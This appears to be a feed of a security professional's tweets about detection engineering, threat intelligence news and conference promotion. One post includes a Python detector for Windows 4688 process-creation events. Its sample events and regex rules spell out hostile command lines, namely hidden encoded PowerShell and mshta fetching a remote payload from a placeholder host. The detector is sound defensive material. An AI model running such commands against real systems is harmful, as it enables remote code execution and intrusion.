Insight from a cybersecurity professional and his faithful Chocolate Labrador. Opinions presented here do not reflect the views of any company or client.
Hello World! I decided to start this Twitter account to keep up with current cybersecurity research, analysis, and threat intelligence, as well as interact with other professionals in the field. I’ll do my best to signal-boost posts that I feel will benefit the community!
Microsoft announced today that it will integrate Sysmon natively into Windows 11 and Windows Server 2025 next year, making it unnecessary to deploy the standalone Sysinternals tools.
https://t.co/aomlKYXm5Q
Apparently I’ve avoided this app to the point where it no longer is confident I’m a human… or perhaps my alter-ego is more convincing than I realized? 🤖🐶
People know me for strong opinions on offensive security, threat intel, malware devs, C2 frameworks.
Now it’s time to piss off the defenders.
Process Creation logs (Event ID 4688) are the only sane answer here.
Not DNS query logs. Not PCAPs. Not network logs with login events and failed attempts. That’s just low-context noise or IOC-driven retro-hunting.
PCAPs are fine if you like staring at packets for hours to find a weird TLS handshake. DNS logs? Useful if the attacker was dumb enough to use known domains.
4688 gives you actual behavior. Suspicious subprocesses. Malicious chains. New stuff. Generic patterns.
You can have a different opinion. Doesn’t make it less wrong.
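A minimal illustration of the behaviour-based detection this thread argues for, written as an added example rather than code from the tweet's author. It maps a few constructed 4688 records (the field names follow the real EventData names NewProcessName, ParentProcessName, CommandLine and SubjectUserName; the records themselves are made up for this demo) onto two kinds of rules: parent/child chains that are rarely legitimate, and generic command-line patterns that describe behaviour rather than a known indicator.

```python
"""Toy detector over constructed Windows Security 4688 (process creation) events.

Added example, not the tweet author's code. Field names mirror the real 4688
EventData names; the sample events below are constructed for this demo.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Parent -> child pairs that are rarely legitimate on a workstation
# (document-handling apps spawning script hosts). Keys and values are lower-case basenames.
SUSPICIOUS_CHAINS = {
    "winword.exe": {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"},
    "excel.exe": {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"},
    "outlook.exe": {"cmd.exe", "powershell.exe", "wscript.exe"},
}

# Generic command-line patterns: behaviour, not a specific domain or hash.
COMMANDLINE_PATTERNS = [
    ("encoded_powershell",
     re.compile(r"powershell[^\n]*\s-(?:e|enc|encodedcommand)\s", re.I)),
    ("download_cradle",
     re.compile(r"(?:downloadstring|invoke-webrequest|iwr\s|curl\s|wget\s)", re.I)),
    ("lolbin_mshta_url",
     re.compile(r"mshta(?:\.exe)?\s+(?:https?|vbscript|javascript):", re.I)),
]


@dataclass
class ProcessEvent:
    new_process: str
    parent_process: str
    command_line: str
    user: str


def parse_4688(record: dict) -> ProcessEvent:
    """Map the EventData fields of one 4688 record to a ProcessEvent.

    ParentProcessName and CommandLine may be absent: the former needs
    Windows 10 / Server 2016 or later, the latter needs the
    'Include command line in process creation events' audit setting.
    """
    return ProcessEvent(
        new_process=record["NewProcessName"],
        parent_process=record.get("ParentProcessName", ""),
        command_line=record.get("CommandLine", ""),
        user=record.get("SubjectUserName", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> list[str]:
    """Return the names of every rule that fires for this event."""
    hits: list[str] = []
    parent, child = basename(event.parent_process), basename(event.new_process)
    if child in SUSPICIOUS_CHAINS.get(parent, ()):
        hits.append(f"suspicious_chain:{parent}->{child}")
    for name, pattern in COMMANDLINE_PATTERNS:
        if pattern.search(event.command_line):
            hits.append(name)
    return hits


def scan(records: list[dict]) -> dict[int, list[str]]:
    """Return {record index: [rule names]} for records that fired at least one rule."""
    findings: dict[int, list[str]] = {}
    for i, rec in enumerate(records):
        hits = evaluate(parse_4688(rec))
        if hits:
            findings[i] = hits
    return findings


# Constructed sample events (not real telemetry). The encoded payload is the
# harmless base64 of "AAA" in UTF-16LE; the URL uses a reserved .invalid name.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    {"SubjectUserName": "alice", "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": OFFICE + r"\WINWORD.EXE",
     "CommandLine": '"' + OFFICE + r'\WINWORD.EXE" /n'},
    {"SubjectUserName": "alice", "ParentProcessName": OFFICE + r"\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEA"},
    {"SubjectUserName": "bob", "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all"},
    {"SubjectUserName": "bob", "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/payload.hta"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        ev = parse_4688(SAMPLE_EVENTS[idx])
        print(f"[{idx}] user={ev.user} {basename(ev.parent_process)} -> {basename(ev.new_process)}: {rules}")
```

The point the thread makes shows up in the second record: nothing in it is a known domain or hash, yet the parent/child relationship and the command-line shape are enough to flag it. The practical caveat is in `parse_4688`: without the command-line audit setting enabled and a Windows version that records ParentProcessName, 4688 degrades to a bare process name and most of these rules have nothing to match on.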
Microsoft Threat Intelligence Center discovered an active and successful device code phishing campaign by a threat actor we track as Storm-2372. Storm-2372’s targets include governments, NGOs, IT services and technology, defense, telecoms, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 aligns with Russian interests, victimology, and tradecraft.
Our ongoing investigation indicates that this campaign has been active since August 2024, with the actor creating lures that resemble messaging app experiences including WhatsApp, Signal, and Microsoft Teams. In device code phishing, threat actors exploit the device code authentication flow to capture authentication tokens, which they then use to access target accounts, and further gain access to data and other services that the compromised account has access to.
Read our research on the active threat represented by Storm-2372 and other threat actors exploiting device code phishing techniques, and get detection and mitigation guidance: https://t.co/D0FHTJVuGF
ICYMI: Trump administration axed all advisory committee members in DHS, including the people that make up the Cybersecurity and Infrastructure Security Agency's (CISA) Cyber Safety Review Board (CSRB). https://t.co/MinZKNK5LP
We're just two weeks away from the SANS CTI Summit, one of my favorite conferences of the year! I've seen several presentation drafts, and they are 🔥. Register today to join Live Online (free!) or in-person in Alexandria, VA!
➡️ Register: https://t.co/uBkLbdD167
@sansforensics
Admittedly I’ve been quiet on here lately due to a generally hectic holiday household, but I always recommend and make it a point to complete this challenge every December!
#AdventOfCyber is HERE! 🚨🎅
🔗 https://t.co/N37yYGq4Gb
Take on daily beginner-friendly challenges throughout December to be in with the chance of winning from our $100,000 prize draw 🎁🎄
BEN SAID I COULD DO A GIVEAWAY TOO 🥳
HackingHub Black Friday deal: https://t.co/Uf3mW11mcR
$39 for lifetime access ♾️
OR
$19 for a month trial ⏰
AND I can match his giveaway--
2️⃣ WINNERS (1 each)
- Full cert bundle
- Lifetime access
To enter: ↪️ retweet and reply w/ 🦃
I created the first draft of a website for the EDR telemetry project to help people quickly compare vendor telemetry visibility. What do you think about it? Are there any specific features you want to see for the website?
Built with ChatGPT 4o with canvas (wanted to test it out😂)
EDR Telemetry project 🔗: https://t.co/8DmXzffYVC
Topic that arose while discussing Kindergarten career day: anybody have experience/resources on how to explain InfoSec to children? Would be intrigued to see any resources/talks… otherwise I may just need to make my own… 🤔
What people often overlook in #DetectionEngineering is that there’s no "one-size-fits-all" rule to detect a threat. It depends on your goals.
How specific should the rule be? Are you tracking a threat actor, detecting the tool/malware, or focusing on the technique? Should it be based on code, content, form, or metadata?
Just like in art, you can create an abstract, impressionist, or realistic painting of the same subject, and all can be masterpieces in their own right.
If your family hasn’t received a phone call from “family” saying they’ve “been in an accident and need money for bail”, they likely will in the next few years.
This AI voice clone scam is so easy to make and I’ve had folks left and right telling me they’re getting these calls.